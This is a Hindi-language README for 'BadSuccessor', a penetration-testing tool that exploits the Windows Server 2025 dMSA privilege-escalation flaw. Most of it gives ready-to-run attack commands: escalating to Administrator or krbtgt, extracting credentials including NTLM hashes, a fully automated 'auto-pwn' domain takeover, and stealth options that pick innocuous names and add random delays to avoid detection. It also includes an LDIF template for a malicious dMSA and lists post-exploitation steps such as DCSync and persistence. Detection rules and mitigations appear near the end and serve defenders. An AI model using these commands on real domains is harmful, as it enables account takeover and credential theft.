
Windows Server 2025 dMSA विशेषाधिकार वृद्धि भेद्यता का दोहन करके लिखने योग्य OU की सूची बनाता है, मनमाने डोमेन उपयोगकर्ताओं तक विशेषाधिकार बढ़ाता है, क्रेडेंशियल निकालता है, और अधिकृत AD सुरक्षा मूल्यांकनों में डोमेन टेकओवर सक्षम करता है।
एक पैठ परीक्षण उपकरण जो Windows Server 2025 Active Directory वातावरण में dMSA (प्रत्यायोजित प्रबंधित सेवा खाता) विशेषाधिकार वृद्धि भेद्यता का शोषण करता है।
यह उपकरण केवल अधिकृत पैठ परीक्षण और सुरक्षा अनुसंधान उद्देश्यों के लिए है। स्पष्ट लिखित अनुमति के बिना सिस्टम के विरुद्ध इस उपकरण का उपयोग अवैध और अनैतिक है। लेखक इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं।
महत्वपूर्ण: यह उपकरण सक्रिय विकास और परीक्षण के अधीन है।
हम सुरक्षा समुदाय को प्रोत्साहित करते हैं:
इस उपकरण का उपयोग करके, आप स्वीकार करते हैं कि यह सक्रिय विकास के अधीन है और आपके विशिष्ट वातावरण के लिए संशोधनों की आवश्यकता हो सकती है।
BadSuccessor Windows Server 2025 की प्रत्यायोजित प्रबंधित सेवा खाता (dMSA) सुविधा में विशेषाधिकार वृद्धि भेद्यता का शोषण करता है। यह भेद्यता न्यूनतम अनुमतियों वाले हमलावरों को डोमेन में किसी भी उपयोगकर्ता, जिसमें डोमेन व्यवस्थापक शामिल हैं, के लिए विशेषाधिकार बढ़ाने की अनुमति देती है।
यह उपकरण Akamai Technologies से Yuval Gordon के उत्कृष्ट अनुसंधान पर आधारित है:
यह भेद्यता dMSA प्रवासन प्रक्रिया में मौजूद है जहाँ:
msDS-ManagedAccountPrecededByLink या ms-DS-Managed-Account-Preceded-By-Link को लक्षित उपयोगकर्ता की ओर इंगित करने के लिए सेट करता हैmsDS-DelegatedMSAState या ms-DS-Delegated-MSA-State को 2 (प्रवासन पूर्ण) पर सेट करता हैइसके अतिरिक्त, KERB-DMSA-KEY-PACKAGE संरचना में लक्षित उपयोगकर्ता के पासवर्ड कुंजियाँ होती हैं, जिससे क्रेडेंशियल निष्कर्षण सक्षम होता है।
pip3 install ldap3 pyasn1 pycryptodome pip3 install impacket==0.12.0
**नोट**: इस टूल का परीक्षण impacket 0.12.0 के साथ किया गया है। संस्करण संगतता चेतावनियाँ रनटाइम पर प्रदर्शित की जाती हैं।
### वैकल्पिक निर्भरताएँ```bash
# For DNS discovery
pip3 install dnspython
# For enhanced Kerberos support (system packages)
# Ubuntu/Debian
sudo apt-get install libkrb5-dev libgssapi-krb5-2
# RHEL/CentOS/Fedora
sudo yum install krb5-devel
CreateChild अनुमतिWrite अनुमतिGenericWrite अनुमतिGenericAll अनुमतिgit clone https://github.com/cybrly/badsuccessor.git cd badsuccessor pip3 install -r requirements.txt chmod +x badsuccessor.py
### requirements.txt```
ldap3>=2.9.1
pyasn1>=0.4.8
pycryptodome>=3.15.0
impacket==0.12.0
dnspython>=2.1.0
python3 badsuccessor.py -d -u -p [options]
### त्वरित प्रारंभ उदाहरण
#### 1. ड्राई रन मोड (नया) - बिना परिवर्तन किए परीक्षण करें```bash
# Simulate attack to verify viability
python3 badsuccessor.py -d corp.local -u john -p Password123 --dry-run --target Administrator
# Dry run with specific OU
python3 badsuccessor.py -d corp.local -u john -p Password123 --dry-run --target Administrator --ou-dn "OU=ServiceAccounts,DC=corp,DC=local"
python3 badsuccessor.py -d corp.local -u john -p Password123 --check-schema
python3 badsuccessor.py -d corp.local -u john -p Password123 --enumerate
python3 badsuccessor.py -d corp.local -u john -p Password123 --list-targets
python3 badsuccessor.py -d corp.local -u john -p Password123 --validate-target Administrator
#### 3. आक्रमण करें```bash
# Basic attack against Administrator
python3 badsuccessor.py -d corp.local -u john -p Password123 --attack --target Administrator
# Stealth mode with innocuous naming
python3 badsuccessor.py -d corp.local -u john -p Password123 --attack --target Administrator --stealth --random-delay 30
# Attack with custom dMSA attributes
python3 badsuccessor.py -d corp.local -u john -p Password123 --attack --target krbtgt \
--dmsa-name legit_service --dmsa-description "Legitimate Service Account" \
--dmsa-display-name "Production Service"
# Attack with custom naming pattern
python3 badsuccessor.py -d corp.local -u john -p Password123 --attack --target Administrator \
--dmsa-pattern "svc{random}prod"
python3 badsuccessor.py -d corp.local -u john -p Password123 --extract-creds --targets Administrator,krbtgt,svc_sql
python3 badsuccessor.py -d corp.local -u john -p Password123 --auto-pwn
#### 5. सत्र प्रबंधन (नया)```bash
# List all sessions
python3 badsuccessor.py -d corp.local -u john -p Password123 --list-sessions
# Resume a previous session
python3 badsuccessor.py -d corp.local -u john -p Password123 --session-id corp.local_john_1234567890_abcd1234
# Clean up all dMSAs from a session
python3 badsuccessor.py -d corp.local -u john -p Password123 --cleanup-session SESSION_ID
# Clean up all dMSAs from current session
python3 badsuccessor.py -d corp.local -u john -p Password123 --cleanup-all
python3 badsuccessor.py -d corp.local -u john -p Password123 --enumerate --export-json results.json
python3 badsuccessor.py -d corp.local -u john -p Password123 --enumerate --export-csv writable_ous.csv
python3 badsuccessor.py -d corp.local -u john -p Password123 --enumerate --export-html report.html
python3 badsuccessor.py -d corp.local -u john -p Password123 --attack --target Administrator
--export-json attack_results.json --export-html attack_report.html
### कमांड लाइन विकल्प
#### प्रमाणीकरण तर्क
| विकल्प | विवरण |
|--------|-------------|
| `-d, --domain` | लक्ष्य डोमेन (जैसे, corp.local) **[आवश्यक]** |
| `-u, --username` | प्रमाणीकरण हेतु उपयोगकर्ता नाम **[आवश्यक]** |
| `-p, --password` | प्रमाणीकरण हेतु पासवर्ड |
| `--dc-ip` | डोमेन कंट्रोलर IP (छोड़े जाने पर स्वतः खोजें) |
| `--ldaps` | पोर्ट 636 पर LDAPS (SSL) कनेक्शन बाध्य करें |
#### आक्रमण मोड
| विकल्प | विवरण |
|--------|-------------|
| `--attack` | BadSuccessor आक्रमण करें |
| `--dry-run` | **नया**: बिना परिवर्तन किए आक्रमण का अनुकरण करें |
| `--extract-creds` | की पैकेज का उपयोग करके क्रेडेंशियल निकालें |
| `--auto-pwn` | पूर्ण रूप से स्वचालित डोमेन अधिग्रहण |
#### लक्ष्य विशिष्टता
| विकल्प | विवरण |
|--------|-------------|
| `--target` | वह लक्ष्य उपयोगकर्ता जिसके लिए विशेषाधिकार बढ़ाने हैं |
| `--targets` | क्रेडेंशियल निष्कर्षण हेतु उपयोगकर्ताओं की अल्पविराम-पृथक सूची |
| `--validate-target` | **नया**: आक्रमण किए बिना लक्ष्य खाते को मान्य करें |
#### dMSA कॉन्फ़िगरेशन
| विकल्प | विवरण |
|--------|-------------|
| `--dmsa-name` | दुर्भावनापूर्ण dMSA हेतु नाम (निर्दिष्ट न करने पर स्वतः उत्पन्न) |
| `--dmsa-pattern` | **नया**: dMSA नामकरण हेतु पैटर्न (जैसे, "svc{random}{target}") |
| `--ou-dn` | उपयोग हेतु विशिष्ट OU DN (निर्दिष्ट न करने पर स्वतः पहचान) |
| `--dmsa-description` | **नया**: निर्मित dMSA हेतु विवरण |
| `--dmsa-display-name` | **नया**: निर्मित dMSA हेतु प्रदर्शन नाम |
#### गणना विकल्प
| विकल्प | विवरण |
|--------|-------------|
| `--enumerate` | किसी भी लेखन अनुमति वाले OU की गणना करें |
| `--list-targets` | उच्च-मूल्य वाले लक्ष्यों की सूची दिखाएं |
| `--check-schema` | Windows Server 2025 स्कीमा सत्यापित करें |
#### सत्र प्रबंधन (नया)
| विकल्प | विवरण |
|--------|-------------|
| `--session-id` | मौजूदा सत्र फिर से शुरू करें |
| `--list-sessions` | सभी उपलब्ध सत्रों की सूची दिखाएं |
| `--cleanup-session SESSION_ID` | किसी सत्र से सभी dMSA साफ़ करें |
#### सफाई विकल्प
| विकल्प | विवरण |
|--------|-------------|
| `--cleanup` | निर्मित dMSA हटाएं |
| `--dmsa-dn` | सफाई कार्यों हेतु dMSA DN |
| `--cleanup-all` | **नया**: वर्तमान सत्र से सभी dMSA साफ़ करें |
#### आउटपुट विकल्प
| विकल्प | विवरण |
|--------|-------------|
| `--export-json FILE` | **नया**: परिणामों को JSON फ़ाइल में निर्यात करें |
| `--export-csv FILE` | **नया**: परिणामों को CSV फ़ाइल में निर्यात करें |
| `--export-html FILE` | **नया**: HTML रिपोर्ट तैयार करें |
| `--no-banner` | बैनर आउटपुट दबाएं |
| `--verbose` | विस्तृत आउटपुट सक्षम करें |
#### स्टील्थ विकल्प (नया)
| विकल्प | विवरण |
|--------|-------------|
| `--stealth` | स्टील्थ मोड सक्षम करें (हानिरहित नामकरण) |
| `--random-delay SECONDS` | संचालनों के बीच यादृच्छिक विलंब (0-N सेकंड) |
## 🔧 आक्रमण कार्यप्रवाह
### चरण 1: टोही
1. **स्कीमा सत्यापन**: गतिशील विशेषता पहचान के साथ Windows Server 2025 dMSA समर्थन की पुष्टि करता है
2. **अनुमति खोज**: किसी भी लेखन पहुँच वाले OU की पहचान करता है (सिर्फ CreateChild नहीं)
3. **लक्ष्य सत्यापन**: **नया** - आक्रमण से पहले व्यापक लक्ष्य खाता विश्लेषण
### चरण 2: शोषण
1. **ड्राई रन विकल्प**: **नया** - बिना परिवर्तन किए आक्रमण की व्यवहार्यता का परीक्षण करें
2. **dMSA निर्माण**: अनुकूलन योग्य विशेषताओं के साथ दुर्भावनापूर्ण dMSA बनाता है
3. **विशेषता हेरफेर**: स्कीमा जागरूकता के साथ पूर्ववर्ती लिंक और माइग्रेशन स्थिति सेट करता है
4. **सत्र ट्रैकिंग**: **नया** - आसान सफाई हेतु सभी निर्मित ऑब्जेक्ट ट्रैक किए जाते हैं
### चरण 3: प्रमाणीकरण
1. **Kerberos TGT अनुरोध**: विरासत में मिले विशेषाधिकारों के साथ TGT प्राप्त करता है
2. **PAC विश्लेषण**: विरासत में मिली समूह सदस्यताओं को सत्यापित करता है
3. **की पैकेज निष्कर्षण**: एकाधिक फ़ॉलबैक विधियों के साथ उन्नत पार्सिंग
### चरण 4: पोस्ट-शोषण
यह टूल उपयोग-हेतु-तैयार कमांड प्रदान करता है:
- DCSync आक्रमण (सभी डोमेन हैश डंप करें)
- रिमोट कमांड निष्पादन
- पार्श्विक गतिविधि
- स्थायित्व स्थापना
## 🔐 प्रोडक्शन-तैयार विशेषताएँ (v3.0.0)
### गतिशील स्कीमा पहचान (नया)
- स्वचालित रूप से पता लगाता है कि आपका वातावरण किस विशेषता नामकरण परंपरा का उपयोग करता है
- dMSA विशेषताओं के सभी ज्ञात रूपों का समर्थन करता है
- विभिन्न Windows Server 2025 बिल्ड हेतु फ़ॉलबैक तंत्र
### उन्नत लक्ष्य सत्यापन (नया)
- आक्रमण-पूर्व लक्ष्य खातों का सत्यापन
- अक्षम, लॉक या समाप्त खातों का पता लगाता है
- स्मार्टकार्ड आवश्यकताओं और प्रत्यायोजन प्रतिबंधों के बारे में चेतावनी देता है
- लक्ष्य गुणों के आधार पर अनुशंसाएँ प्रदान करता है
### सत्र प्रबंधन (नया)
- संचालनों में स्थायी सत्र ट्रैकिंग
- बाधित आक्रमण फिर से शुरू करें
- सभी निर्मित dMSA की थोक सफाई
- सत्र फ़ाइलें 0700 अनुमतियों के साथ सुरक्षित रूप से संग्रहीत
### ड्राई रन मोड (नया)
- बिना कोई परिवर्तन किए आक्रमण की व्यवहार्यता का परीक्षण करें
- स्कीमा, अनुमतियों और लक्ष्य को मान्य करता है
- रिपोर्ट करता है कि वास्तविक आक्रमण के दौरान वास्तव में क्या होगा
- टोही और योजना हेतु उत्तम
### स्टील्थ विशेषताएँ (नया)
- हानिरहित dMSA नामकरण पैटर्न जो घुलमिल जाते हैं
- संचालनों के बीच यादृच्छिक विलंब
- अनुकूलन योग्य dMSA विशेषताएँ (विवरण, प्रदर्शन नाम)
- चर के साथ पैटर्न-आधारित नामकरण
### व्यावसायिक आउटपुट प्रारूप (नया)
- अन्य टूल के साथ एकीकरण हेतु JSON निर्यात
- स्प्रेडशीट विश्लेषण हेतु CSV निर्यात
- स्टाइलिश आउटपुट के साथ HTML रिपोर्ट
- सभी संचालनों हेतु संरचित डेटा
### एंटरप्राइज़-ग्रेड त्रुटि प्रबंधन
- कार्यान्वयन योग्य समाधानों के साथ व्यापक त्रुटि संदेश
- सभी संचालनों हेतु सुचारू फ़ॉलबैक
- टाइमस्टैम्प और गंभीरता के साथ विस्तृत लॉगिंग
- समस्या निवारण हेतु वर्बोज़ मोड
### पूर्ण कार्यान्वयन
- सभी विशेषताएँ पूर्ण रूप से कार्यान्वित (कोई प्लेसहोल्डर कोड नहीं)
- प्रोडक्शन-परीक्षित कोड संरचना
- विशेषज्ञ कक्षाओं के साथ मॉड्यूलर डिज़ाइन
- विभिन्न AD कॉन्फ़िगरेशन के साथ पूर्ण संगतता
## 🛡️ पहचान
### निगरानी हेतु इवेंट ID
| इवेंट ID | स्रोत | विवरण |
|----------|--------|-------------|
| **5137** | सुरक्षा | निर्देशिका सेवा ऑब्जेक्ट निर्माण (dMSA) |
| **5136** | सुरक्षा | निर्देशिका सेवा ऑब्जेक्ट संशोधन |
| **2946** | निर्देशिका सेवा | समूह प्रबंधित सेवा खाता प्रमाणीकरण |
| **4768** | सुरक्षा | Kerberos TGT अनुरोधित |
| **4769** | सुरक्षा | Kerberos सेवा टिकट अनुरोधित |
### पहचान नियम```
# Splunk Query Example
index=windows EventCode=5137
| where ObjectClass="msDS-DelegatedManagedServiceAccount" OR ObjectClass="ms-DS-Delegated-Managed-Service-Account"
| where NOT user IN ("approved_admins")
# Sigma Rule Example
detection:
selection:
EventID: 5136
AttributeLDAPDisplayName:
- 'msDS-ManagedAccountPrecededByLink'
- 'ms-DS-Managed-Account-Preceded-By-Link'
condition: selection
OU अनुमतियाँ प्रतिबंधित करें ```powershell
Remove-ADPermission -Identity "OU=ServiceAccounts,DC=corp,DC=local" -User "Domain Users" -AccessRights CreateChild,Write,GenericWrite,GenericAll
Get-ADPermission -Identity "OU=ServiceAccounts,DC=corp,DC=local" | Where-Object {$_.IdentityReference -match "Authenticated Users|Everyone"}
dMSA संचालन की निगरानी करें ```powershell
Set-ADObject -Identity "CN=Schema,CN=Configuration,DC=corp,DC=local" -Add @{ 'msDS-ReplAttributeMetaData' = @('msDS-ManagedAccountPrecededByLink', 'ms-DS-Managed-Account-Preceded-By-Link') }
डिटेक्शन लागू करें
Akamai के शोध के आधार पर:
dn: CN=evil_dmsa,OU=ServiceAccounts,DC=corp,DC=local objectClass: top objectClass: msDS-GroupManagedServiceAccount objectClass: msDS-DelegatedManagedServiceAccount sAMAccountName: evil_dmsa$ userAccountControl: 4096
msDS-ManagedAccountPrecededByLink: CN=Administrator,CN=Users,DC=corp,DC=local
ms-DS-Managed-Account-Preceded-By-Link: CN=Administrator,CN=Users,DC=corp,DC=local msDS-DelegatedMSAState: 2 msDS-SupportedEncryptionTypes: 28
### मुख्य पैकेज संरचना
KERB-DMSA-KEY-PACKAGE में शामिल है:
- वर्तमान कुंजियाँ: dMSA की एन्क्रिप्शन कुंजियाँ
- पिछली कुंजियाँ: लक्षित उपयोगकर्ता की एन्क्रिप्शन कुंजियाँ (NTLM हैश सहित)
- पासवर्ड क्रैकिंग के बिना सीधे क्रेडेंशियल निष्कर्षण सक्षम करता है
## 🤝 योगदान
योगदान का स्वागत है! कृपया:
1. रिपॉजिटरी को फोर्क करें
2. फीचर ब्रांच बनाएं (`git checkout -b feature/enhancement`)
3. परिवर्तन कमिट करें (`git commit -m 'Add new feature'`)
4. ब्रांच पर पुश करें (`git push origin feature/enhancement`)
5. पुल रिक्वेस्ट सबमिट करें
### विकास दिशानिर्देश
- PEP 8 स्टाइल गाइड का पालन करें
- नई सुविधाओं के लिए यूनिट टेस्ट जोड़ें
- दस्तावेज़ीकरण अपडेट करें
- कई AD वातावरणों के विरुद्ध परीक्षण करें
- विभिन्न स्कीमा विशेषता नामकरण परंपराओं के साथ परीक्षण करें
- सुनिश्चित करें कि सभी सुविधाएँ उत्पादन-तैयार हैं (कोई प्लेसहोल्डर नहीं)
## 📝 परिवर्तन लॉग
### v2.3.0 (2025-05-28) - उत्पादन-तैयार रिलीज़
- **नया**: सुरक्षित हमले के अनुकरण के लिए ड्राई रन मोड
- **नया**: स्टेट पर्सिस्टेंस के साथ व्यापक सत्र प्रबंधन
- **नया**: विस्तृत विश्लेषण के साथ लक्ष्य खाता सत्यापन
- **नया**: निर्यात क्षमताएँ (JSON, CSV, HTML)
- **नया**: हानिरहित नामकरण पैटर्न के साथ स्टील्थ मोड
- **नया**: अनुकूलन योग्य dMSA विशेषताएँ (विवरण, प्रदर्शन नाम)
- **नया**: चर के साथ पैटर्न-आधारित dMSA नामकरण
- **नया**: स्टील्थ कार्यों के लिए यादृच्छिक विलंब समर्थन
- **नया**: गतिशील स्कीमा विशेषता पहचान
- **नया**: फॉलबैक के साथ बेहतर कुंजी पैकेज पार्सिंग
- **नया**: बल्क क्लीनअप ऑपरेशन
- **नया**: पेशेवर त्रुटि हैंडलिंग और लॉगिंग
- **सुधार**: पूर्ण मॉड्यूलर आर्किटेक्चर
- **सुधार**: निर्भरताओं के लिए संस्करण जाँच
- **ठीक किया गया**: सभी प्लेसहोल्डर कोड को पूर्ण कार्यान्वयन से बदल दिया गया
### v2.2.0 (2025-05-27) - संगतता अद्यतन
- **ठीक किया गया**: impacket आयात समस्याएँ हल की गईं (seq_decode निर्भरता हटाई गई)
- **ठीक किया गया**: impacket 0.12.0 के साथ संगत
- **सुविधा**: दोनों dMSA विशेषता नामकरण परंपराओं के लिए समर्थन जोड़ा गया
- **सुधार**: आयात विफलताओं के लिए बेहतर त्रुटि हैंडलिंग
- **सुधार**: अधिक मजबूत स्कीमा पहचान
### v2.1.0 (2025-05-25) - पूर्ण कार्यान्वयन
- **मुख्य**: बेहतर ACL अनुमति जाँच - अब सभी लेखन अनुमतियों का पता लगाता है
- **मुख्य**: डिफ़ॉल्ट समूहों के लिए समर्थन जोड़ा गया (Authenticated Users, Everyone, आदि)
- **ठीक किया गया**: सभी प्लेसहोल्डर कोड हटाए गए
- **ठीक किया गया**: सभी सुविधाओं का पूर्ण कार्यान्वयन
- **सुधार**: बेहतर त्रुटि हैंडलिंग और सूचनात्मक आउटपुट
- **सुधार**: अधिक व्यापक OU गणना (कंटेनर शामिल हैं)
- **सुविधा**: खोजे गए प्रत्येक OU के लिए सटीक अनुमतियाँ दिखाता है
- **सुविधा**: सुरक्षित उपयोगकर्ताओं और प्रत्यायोजन प्रतिबंधों का पता लगाता है
### v2.0.0 (2025-05-24) - उन्नत संस्करण
- **मुख्य**: पूर्ण Kerberos प्रमाणीकरण कार्यान्वयन
- **मुख्य**: क्रेडेंशियल चोरी के लिए KERB-DMSA-KEY-PACKAGE निष्कर्षण
- **मुख्य**: बुनियादी ACL अनुमति जाँच
- **मुख्य**: Windows Server 2025 स्कीमा सत्यापन
- **सुविधा**: बड़े पैमाने पर क्रेडेंशियल निष्कर्षण मोड
- **सुविधा**: स्वचालित डोमेन अधिग्रहण के लिए ऑटो-प्यून
- **सुविधा**: बेहतर लक्ष्य गणना
- **सुविधा**: पोस्ट-एक्सप्लॉइटेशन कमांड जनरेशन
- **सुधार**: बेहतर त्रुटि हैंडलिंग और लॉगिंग
- **सुधार**: उत्पादन-तैयार कोड संरचना
## 📚 संदर्भ
- [मूल अकामाई अनुसंधान](https://www.akamai.com/blog/security-research/abusing-dmsa-for-privilege-escalation-in-active-directory)
- [GitHub मुद्दा #1 - बेहतर अनुमति जाँच](https://github.com/cybrly/badsuccessor/issues/1)
- [GitHub मुद्दा #2 - स्कीमा विशेषता नामकरण](https://github.com/cybrly/badsuccessor/issues/2)
- [Microsoft सुरक्षा प्रतिक्रिया केंद्र](https://msrc.microsoft.com/)
## 🐛 ज्ञात समस्याएँ
- कुछ वातावरण विभिन्न विशेषता नामकरण परंपराओं का उपयोग कर सकते हैं (गतिशील पहचान द्वारा संभाला जाता है)
- हैश प्रमाणीकरण के लिए प्रारंभिक कार्यान्वयन में पासवर्ड आवश्यक है
- कुछ वातावरणों में मैनुअल Kerberos कॉन्फ़िगरेशन आवश्यक हो सकता है
- पहचान नियमों को प्रति वातावरण अनुकूलन की आवश्यकता होती है
## 🔍 समस्या निवारण
### आयात त्रुटियाँ
यदि आपको impacket के साथ आयात त्रुटियाँ मिलती हैं:```bash
# Ensure you have the correct version
pip3 uninstall impacket
pip3 install impacket==0.12.0
# Check version
python3 -c "import impacket; print(impacket.__version__)"
टूल में अब डायनामिक स्कीमा डिटेक्शन शामिल है। यदि यह अभी भी विफल रहता है:```powershell
Get-ADObject -Filter {name -like "delegated" -or name -like "preceded"} -SearchBase "CN=Schema,CN=Configuration,DC=corp,DC=local" | Select Name
### अनुमति अस्वीकृत त्रुटियाँ
परीक्षण के लिए नए dry-run मोड का उपयोग करें:```bash
# Test without making changes
python3 badsuccessor.py -d corp.local -u john -p Password123 --dry-run --target Administrator
# Check your exact permissions
python3 badsuccessor.py -d corp.local -u john -p Password123 --enumerate --verbose
python3 badsuccessor.py -d corp.local -u john -p Password123 --list-sessions
rm -rf /tmp/.badsuccessor_sessions/
## 📧 संपर्क
प्रश्नों, समस्याओं, या जिम्मेदार प्रकटीकरण के लिए:
- GitHub Issue खोलें
- जिम्मेदार प्रकटीकरण प्रथाओं का पालन करें
- पैच विकास के लिए 90 दिन का समय दें
---
**⚡ याद रखें: अधिक शक्ति के साथ अधिक जिम्मेदारी आती है। परीक्षण से पहले हमेशा उचित प्राधिकरण प्राप्त करें!** 🔐